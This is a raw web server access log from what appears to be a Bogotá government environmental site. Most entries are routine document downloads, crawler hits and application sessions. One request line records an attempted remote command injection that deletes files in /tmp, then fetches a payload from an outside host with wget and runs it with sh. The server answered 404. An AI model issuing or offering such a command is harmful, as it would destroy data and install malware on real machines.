108.174.5.112 - - [07/Jan/2023:20:56:51 -0500] "GET /secretaria-de-ambiente-reconocio-las-234-empresas-y-entidades-con-mejores-estrategias-de-gestion-ambiental.html HTTP/1.1" 206 1048
172.22.2.4 - - [07/Jan/2023:20:55:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
69.171.249.6 - - [07/Jan/2023:20:57:44 -0500] "GET /images/jardines-verticales-plantas-24-mayo.jpg HTTP/1.1" 200 148288
207.46.13.41 - - [07/Jan/2023:20:58:28 -0500] "GET /BLA/boletinlegal/images/signo-menos.gif HTTP/1.1" 200 13454
201.245.192.253 - - [07/Jan/2023:20:58:56 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
50.17.153.117 - - [07/Jan/2023:20:59:48 -0500] "GET /BLA/boletinlegal/Directivas/2018/Directiva%20No.%2025%20del%2027%20de%20diciembre%20de%202018.pdf HTTP/1.1" 200 1351319
3.82.54.46 - - [07/Jan/2023:21:00:52 -0500] "GET /BLA/boletinlegal/Directivas/2017/Directiva%20No.%2003%20del%2024%20de%20Febrero%20de%202017.pdf HTTP/1.1" 200 6911517
216.245.221.92 - - [07/Jan/2023:21:01:10 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [07/Jan/2023:21:02:22 -0500] "GET /BLA/boletinlegal/Directivas/2011/Directiva%20No.%209%20del%2023%20de%20Septiembre%20de%202011.pdf HTTP/1.1" 304 -
172.22.2.4 - - [07/Jan/2023:21:00:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
185.119.81.100 - - [07/Jan/2023:21:03:11 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.100 - - [07/Jan/2023:21:03:12 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
172.22.2.4 - - [07/Jan/2023:21:01:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52942
201.245.192.253 - - [07/Jan/2023:21:03:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
200.116.231.67 - - [07/Jan/2023:21:05:58 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2018%2F HTTP/1.1" 200 447522
216.245.221.92 - - [07/Jan/2023:21:06:10 -0500] "HEAD / HTTP/1.1" 200 -
200.116.231.67 - - [07/Jan/2023:21:06:13 -0500] "GET /BLA/resoluciones/AUTOS%202018/0657.pdf HTTP/1.1" 200 260024
157.55.39.179 - - [07/Jan/2023:21:06:36 -0500] "GET /BLA/resoluciones/AUTOS%202018/6364.pdf HTTP/1.1" 304 -
52.205.128.3 - - [07/Jan/2023:21:07:26 -0500] "GET /BLA/boletinlegal/Directivas/2017/Directiva%20No.%2001%20del%2017%20de%20Enero%20de%202017.pdf HTTP/1.1" 200 2804310
54.158.43.92 - - [07/Jan/2023:21:08:14 -0500] "GET /transparencia/directorioservidores/MANUAL%20DE%20FUNCIONES%2002666%20DEL%204-DIC-2015.pdf HTTP/1.1" 200 52098444
172.22.2.4 - - [07/Jan/2023:21:06:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [07/Jan/2023:21:08:54 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
172.22.2.4 - - [07/Jan/2023:21:07:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
173.252.79.120 - - [07/Jan/2023:21:09:21 -0500] "GET /images/cr\xc3\xb3nica-29-nov-1_optimized.jpeg HTTP/1.1" 404 1034
216.245.221.92 - - [07/Jan/2023:21:11:10 -0500] "HEAD / HTTP/1.1" 200 -
186.80.52.223 - - [07/Jan/2023:21:12:09 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 147124
186.80.52.223 - - [07/Jan/2023:21:12:10 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 147124
186.80.52.223 - - [07/Jan/2023:21:12:11 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 147124
186.80.52.223 - - [07/Jan/2023:21:12:12 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 147124
186.80.52.223 - - [07/Jan/2023:21:12:15 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 5281
186.80.52.223 - - [07/Jan/2023:21:12:19 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 42165
186.80.52.223 - - [07/Jan/2023:21:12:19 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.80.52.223 - - [07/Jan/2023:21:12:19 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.223 - - [07/Jan/2023:21:12:19 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.223 - - [07/Jan/2023:21:12:19 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.223 - - [07/Jan/2023:21:12:19 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.223 - - [07/Jan/2023:21:12:20 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.223 - - [07/Jan/2023:21:12:20 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.223 - - [07/Jan/2023:21:12:20 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 35538
186.80.52.223 - - [07/Jan/2023:21:12:20 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 35538
186.80.52.223 - - [07/Jan/2023:21:12:21 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 35538
186.80.52.223 - - [07/Jan/2023:21:12:45 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12922
186.80.52.223 - - [07/Jan/2023:21:12:49 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 156531
186.80.52.223 - - [07/Jan/2023:21:12:50 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.80.52.223 - - [07/Jan/2023:21:12:50 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.223 - - [07/Jan/2023:21:12:50 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.223 - - [07/Jan/2023:21:12:50 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.223 - - [07/Jan/2023:21:12:50 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.223 - - [07/Jan/2023:21:12:51 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.223 - - [07/Jan/2023:21:12:51 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.223 - - [07/Jan/2023:21:13:05 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 5518
201.245.192.253 - - [07/Jan/2023:21:13:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
172.22.2.4 - - [07/Jan/2023:21:12:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [07/Jan/2023:21:13:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54100
216.245.221.92 - - [07/Jan/2023:21:16:10 -0500] "HEAD / HTTP/1.1" 200 -
186.80.174.201 - - [07/Jan/2023:21:16:45 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12500
186.80.174.201 - - [07/Jan/2023:21:16:45 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css;jsessionid=btXjB2XxgZNNEHFQ9-19OSKU.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 542
186.80.174.201 - - [07/Jan/2023:21:16:45 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css;jsessionid=btXjB2XxgZNNEHFQ9-19OSKU.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 53295
186.80.174.201 - - [07/Jan/2023:21:16:45 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js;jsessionid=btXjB2XxgZNNEHFQ9-19OSKU.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 105384
186.80.174.201 - - [07/Jan/2023:21:16:45 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 304 -
186.80.174.201 - - [07/Jan/2023:21:16:45 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js;jsessionid=btXjB2XxgZNNEHFQ9-19OSKU.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 220526
186.80.174.201 - - [07/Jan/2023:21:16:45 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js;jsessionid=btXjB2XxgZNNEHFQ9-19OSKU.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 87560
186.80.174.201 - - [07/Jan/2023:21:16:46 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 200 9694
186.80.174.201 - - [07/Jan/2023:21:16:46 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 200 443
186.80.174.201 - - [07/Jan/2023:21:16:46 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 304 -
186.80.174.201 - - [07/Jan/2023:21:16:46 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 200 50058
186.80.174.201 - - [07/Jan/2023:21:16:45 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js;jsessionid=btXjB2XxgZNNEHFQ9-19OSKU.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 276924
186.80.174.201 - - [07/Jan/2023:21:16:46 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 200 5355
186.80.174.201 - - [07/Jan/2023:21:16:46 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 200 71635
186.80.174.201 - - [07/Jan/2023:21:16:46 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 200 53064
186.80.174.201 - - [07/Jan/2023:21:16:47 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
186.80.174.201 - - [07/Jan/2023:21:16:48 -0500] "GET /sipse/faces/faces/index.xhtml HTTP/1.1" 200 677
186.80.174.201 - - [07/Jan/2023:21:16:48 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.80.174.201 - - [07/Jan/2023:21:16:48 -0500] "GET /sipse/faces/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12178
186.80.174.201 - - [07/Jan/2023:21:16:48 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.80.174.201 - - [07/Jan/2023:21:16:48 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.174.201 - - [07/Jan/2023:21:16:48 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.174.201 - - [07/Jan/2023:21:16:48 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.174.201 - - [07/Jan/2023:21:16:48 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.174.201 - - [07/Jan/2023:21:16:48 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.174.201 - - [07/Jan/2023:21:16:48 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.174.201 - - [07/Jan/2023:21:16:49 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.80.174.201 - - [07/Jan/2023:21:16:52 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 2227
186.80.174.201 - - [07/Jan/2023:21:16:52 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 200 27209
186.80.174.201 - - [07/Jan/2023:21:16:54 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16294
186.80.174.201 - - [07/Jan/2023:21:16:54 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 304 -
186.80.174.201 - - [07/Jan/2023:21:16:54 -0500] "GET /sipse/js/jquery.min.js HTTP/1.1" 304 -
186.80.174.201 - - [07/Jan/2023:21:16:54 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.174.201 - - [07/Jan/2023:21:16:54 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.174.201 - - [07/Jan/2023:21:16:54 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.174.201 - - [07/Jan/2023:21:16:54 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.174.201 - - [07/Jan/2023:21:16:54 -0500] "GET /sipse/imagenes/cargando.gif HTTP/1.1" 304 -
186.80.174.201 - - [07/Jan/2023:21:16:54 -0500] "GET /sipse/imagenes/logoAplicacion.jpg HTTP/1.1" 304 -
186.80.174.201 - - [07/Jan/2023:21:16:54 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
186.80.174.201 - - [07/Jan/2023:21:16:57 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 2658
186.80.174.201 - - [07/Jan/2023:21:16:57 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.80.174.201 - - [07/Jan/2023:21:16:58 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 64423
186.80.174.201 - - [07/Jan/2023:21:16:59 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.174.201 - - [07/Jan/2023:21:16:59 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.174.201 - - [07/Jan/2023:21:16:59 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.174.201 - - [07/Jan/2023:21:16:59 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.174.201 - - [07/Jan/2023:21:16:59 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1560
186.80.174.201 - - [07/Jan/2023:21:17:11 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 31617
173.252.87.12 - - [07/Jan/2023:21:17:17 -0500] "GET /images/animal-langostilla-protocolo-11-noviembre.jpg HTTP/1.1" 200 117767
186.80.174.201 - - [07/Jan/2023:21:17:28 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 911
69.63.189.5 - - [07/Jan/2023:21:18:06 -0500] "GET /bogota-ya-cuenta-con-el-protocolo-para-el-manejo-y-control-de-la-langostilla-de-rio.html HTTP/1.1" 206 1088
201.245.192.253 - - [07/Jan/2023:21:18:52 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
66.249.73.100 - - [07/Jan/2023:21:19:07 -0500] "-" 408 -
190.227.22.147 - - [07/Jan/2023:21:19:07 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+heylitimysun.top/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
201.245.192.253 - - [07/Jan/2023:21:19:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44201
172.22.2.4 - - [07/Jan/2023:21:18:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
172.22.2.4 - - [07/Jan/2023:21:18:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
201.245.192.253 - - [07/Jan/2023:21:19:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44259
172.22.2.4 - - [07/Jan/2023:21:18:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
172.22.2.4 - - [07/Jan/2023:21:18:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
3.84.73.217 - - [07/Jan/2023:21:20:37 -0500] "GET /BLA/boletinlegal/Directivas/2018/Directiva%20No.%2027%20del%2028%20de%20diciembre%20de%202018.pdf HTTP/1.1" 200 2831879
172.22.2.4 - - [07/Jan/2023:21:19:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58612
216.245.221.92 - - [07/Jan/2023:21:21:10 -0500] "HEAD / HTTP/1.1" 200 -
44.210.77.138 - - [07/Jan/2023:21:22:06 -0500] "GET /BLA/boletinlegal/Directivas/2014/Directiva%20No.%205%20del%2026%20de%20Diciembre%20de%202014.pdf HTTP/1.1" 200 3424865
201.245.192.253 - - [07/Jan/2023:21:23:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
173.252.107.118 - - [07/Jan/2023:21:24:35 -0500] "GET /distrito-realiza-las-primeras-vasectomias-a-palomas-de-plaza.html HTTP/1.1" 206 958
66.220.149.120 - - [07/Jan/2023:21:24:36 -0500] "GET /images/imagen-palomas_optimized.jpg HTTP/1.1" 200 184069
3.238.129.204 - - [07/Jan/2023:21:25:33 -0500] "GET /BLA/boletinlegal/Circulares/2009/Circular%20Instructiva%20-%20Memorando%202009IE24363.pdf HTTP/1.1" 200 1544636
66.249.73.127 - - [07/Jan/2023:21:25:47 -0500] "-" 408 -
172.22.2.4 - - [07/Jan/2023:21:24:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [07/Jan/2023:21:26:10 -0500] "HEAD / HTTP/1.1" 200 -
52.205.128.3 - - [07/Jan/2023:21:26:36 -0500] "GET /BLA/boletinlegal/Directivas/2017/Directiva%20No.%2004%20del%2028%20de%20Abril%20de%202017.pdf HTTP/1.1" 200 8194919
172.22.2.4 - - [07/Jan/2023:21:25:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54816
3.230.169.85 - - [07/Jan/2023:21:27:04 -0500] "GET /BLA/boletinlegal/Directivas/2016/Directiva%20No.%2002%20del%2019%20de%20Abril%20de%202016.pdf HTTP/1.1" 200 11898321
200.116.231.67 - - [07/Jan/2023:21:27:12 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2014%2F HTTP/1.1" 200 886125
200.116.231.67 - - [07/Jan/2023:21:27:16 -0500] "GET /BLA/resoluciones/dlf/unknown.png HTTP/1.1" 200 266
200.116.231.67 - - [07/Jan/2023:21:27:36 -0500] "GET /BLA/resoluciones/AUTOS%202014/3443.pdf HTTP/1.1" 200 527060
200.116.231.67 - - [07/Jan/2023:21:27:36 -0500] "GET /BLA/resoluciones/AUTOS%202014/3443.pdf HTTP/1.1" 200 527060
54.162.239.196 - - [07/Jan/2023:21:28:45 -0500] "GET /BLA/boletinlegal/Directivas/2015/Directiva%20No.%2001%20del%2014%20de%20Enero%20de%202015.pdf HTTP/1.1" 200 1416322
201.245.192.253 - - [07/Jan/2023:21:28:50 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
201.245.192.253 - - [07/Jan/2023:21:29:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44201
201.245.192.253 - - [07/Jan/2023:21:29:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44259
186.154.12.114 - - [07/Jan/2023:21:29:42 -0500] "POST /appsia/controlador HTTP/1.1" 200 3226
186.154.12.114 - - [07/Jan/2023:21:29:42 -0500] "GET /appsia/jscripts/validarSolicitud.js HTTP/1.1" 404 68
186.154.12.114 - - [07/Jan/2023:21:29:46 -0500] "POST /appsia/controlador HTTP/1.1" 200 4799
186.154.12.114 - - [07/Jan/2023:21:30:02 -0500] "POST /appsia/controlador HTTP/1.1" 200 3604
186.154.12.114 - - [07/Jan/2023:21:30:03 -0500] "GET /appsia/jscripts/validarSolicitud.js HTTP/1.1" 404 68
186.154.12.114 - - [07/Jan/2023:21:30:10 -0500] "POST /appsia/controlador HTTP/1.1" 200 4799
186.154.12.114 - - [07/Jan/2023:21:30:44 -0500] "POST /appsia/controlador HTTP/1.1" 200 5437
186.154.12.114 - - [07/Jan/2023:21:30:48 -0500] "POST /appsia/controlador HTTP/1.1" 200 7777
186.154.12.114 - - [07/Jan/2023:21:31:04 -0500] "POST /appsia/controlador HTTP/1.1" 200 6642
186.154.12.114 - - [07/Jan/2023:21:31:07 -0500] "POST /appsia/controlador HTTP/1.1" 200 14341
216.245.221.92 - - [07/Jan/2023:21:31:10 -0500] "HEAD / HTTP/1.1" 200 -
186.154.12.114 - - [07/Jan/2023:21:31:26 -0500] "POST /appsia/controlador HTTP/1.1" 200 7777
186.154.12.114 - - [07/Jan/2023:21:31:36 -0500] "POST /appsia/controlador HTTP/1.1" 200 6642
172.22.2.4 - - [07/Jan/2023:21:30:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.154.12.114 - - [07/Jan/2023:21:31:43 -0500] "POST /appsia/controlador HTTP/1.1" 200 14701
172.22.2.4 - - [07/Jan/2023:21:30:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57192
186.154.12.114 - - [07/Jan/2023:21:32:34 -0500] "POST /appsia/controlador HTTP/1.1" 200 7777
186.154.12.114 - - [07/Jan/2023:21:32:43 -0500] "POST /appsia/controlador HTTP/1.1" 200 6642
186.154.12.114 - - [07/Jan/2023:21:32:45 -0500] "POST /appsia/controlador HTTP/1.1" 200 14341
186.154.12.114 - - [07/Jan/2023:21:33:00 -0500] "POST /appsia/controlador HTTP/1.1" 200 7777
186.154.12.114 - - [07/Jan/2023:21:33:13 -0500] "POST /appsia/controlador HTTP/1.1" 200 6642
186.154.12.114 - - [07/Jan/2023:21:33:15 -0500] "POST /appsia/controlador HTTP/1.1" 200 12447
201.245.192.253 - - [07/Jan/2023:21:33:48 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
186.154.12.114 - - [07/Jan/2023:21:33:51 -0500] "POST /appsia/controlador HTTP/1.1" 200 7777
186.154.12.114 - - [07/Jan/2023:21:34:08 -0500] "POST /appsia/controlador HTTP/1.1" 200 6642
186.154.12.114 - - [07/Jan/2023:21:34:10 -0500] "POST /appsia/controlador HTTP/1.1" 200 12431
186.154.12.114 - - [07/Jan/2023:21:34:29 -0500] "POST /appsia/controlador HTTP/1.1" 200 7777
186.154.12.114 - - [07/Jan/2023:21:34:42 -0500] "POST /appsia/controlador HTTP/1.1" 200 6642
186.154.12.114 - - [07/Jan/2023:21:34:47 -0500] "POST /appsia/controlador HTTP/1.1" 200 12059
172.22.2.4 - - [07/Jan/2023:21:33:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 62423
186.154.12.114 - - [07/Jan/2023:21:35:39 -0500] "POST /appsia/controlador HTTP/1.1" 200 7777
186.154.12.114 - - [07/Jan/2023:21:35:56 -0500] "POST /appsia/controlador HTTP/1.1" 200 6642
186.154.12.114 - - [07/Jan/2023:21:35:59 -0500] "POST /appsia/controlador HTTP/1.1" 200 12431
216.245.221.92 - - [07/Jan/2023:21:36:10 -0500] "HEAD / HTTP/1.1" 200 -
54.89.127.143 - - [07/Jan/2023:21:36:57 -0500] "GET /BLA/boletinlegal/Directivas/2017/Directiva%20No.%2002%20del%2017%20de%20Enero%20de%202017.pdf HTTP/1.1" 200 3521427
186.154.12.114 - - [07/Jan/2023:21:37:00 -0500] "POST /appsia/controlador HTTP/1.1" 200 7777
172.22.2.4 - - [07/Jan/2023:21:37:15 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
186.154.12.114 - - [07/Jan/2023:21:37:24 -0500] "POST /appsia/controlador HTTP/1.1" 200 6642
172.22.2.4 - - [07/Jan/2023:21:37:25 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2010%20del%2026%20de%20Enero%20de%202012.pdf HTTP/1.1" 404 1218
172.22.2.4 - - [07/Jan/2023:21:35:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.154.12.114 - - [07/Jan/2023:21:37:51 -0500] "POST /appsia/controlador HTTP/1.1" 200 12447
172.22.2.4 - - [07/Jan/2023:21:36:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52079
201.245.192.253 - - [07/Jan/2023:21:38:47 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
185.119.81.100 - - [07/Jan/2023:21:39:05 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.100 - - [07/Jan/2023:21:39:06 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
186.154.12.114 - - [07/Jan/2023:21:39:07 -0500] "POST /appsia/controlador HTTP/1.1" 200 7777
201.245.192.253 - - [07/Jan/2023:21:39:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44201
201.245.192.253 - - [07/Jan/2023:21:39:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44259
186.154.12.114 - - [07/Jan/2023:21:39:20 -0500] "POST /appsia/controlador HTTP/1.1" 200 6642
186.154.12.114 - - [07/Jan/2023:21:39:22 -0500] "POST /appsia/controlador HTTP/1.1" 200 12059
31.13.127.119 - - [07/Jan/2023:21:40:07 -0500] "GET /images/Aire%20Reyes%20(1)%20(1).jpeg HTTP/1.1" 200 59709
31.13.127.116 - - [07/Jan/2023:21:40:36 -0500] "GET /images/mantener-calidad-del-aire_optimized.jpeg HTTP/1.1" 200 67646
216.245.221.92 - - [07/Jan/2023:21:41:10 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.17 - - [07/Jan/2023:21:42:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%20CONJUNTAS/Resolucion%20Conjunta%2003%20del%2023%20de%20febrero%20de%202015.pdf HTTP/1.1" 304 -
207.46.13.139 - - [07/Jan/2023:21:42:19 -0500] "GET /Publicaciones/2022EE188776.pdf HTTP/1.1" 404 228
172.22.2.4 - - [07/Jan/2023:21:41:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [07/Jan/2023:21:43:46 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43926
172.22.2.4 - - [07/Jan/2023:21:42:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59404
34.204.170.165 - - [07/Jan/2023:21:45:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202013/1197.pdf HTTP/1.1" 200 1787007
192.5.86.237 - - [07/Jan/2023:21:45:38 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
192.5.86.237 - - [07/Jan/2023:21:45:38 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
216.245.221.92 - - [07/Jan/2023:21:46:10 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [07/Jan/2023:21:47:14 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/SENTENCIA%20C-703%20DE%202010.xls HTTP/1.1" 304 -
172.22.2.4 - - [07/Jan/2023:21:47:56 -0500] "GET /BLA/boletinlegal/conceptos.php HTTP/1.1" 200 7450
172.22.2.4 - - [07/Jan/2023:21:48:06 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [07/Jan/2023:21:48:06 -0500] "GET /BLA/boletinlegal/js/ajax_conceptos.js HTTP/1.1" 200 1326
172.22.2.4 - - [07/Jan/2023:21:48:07 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
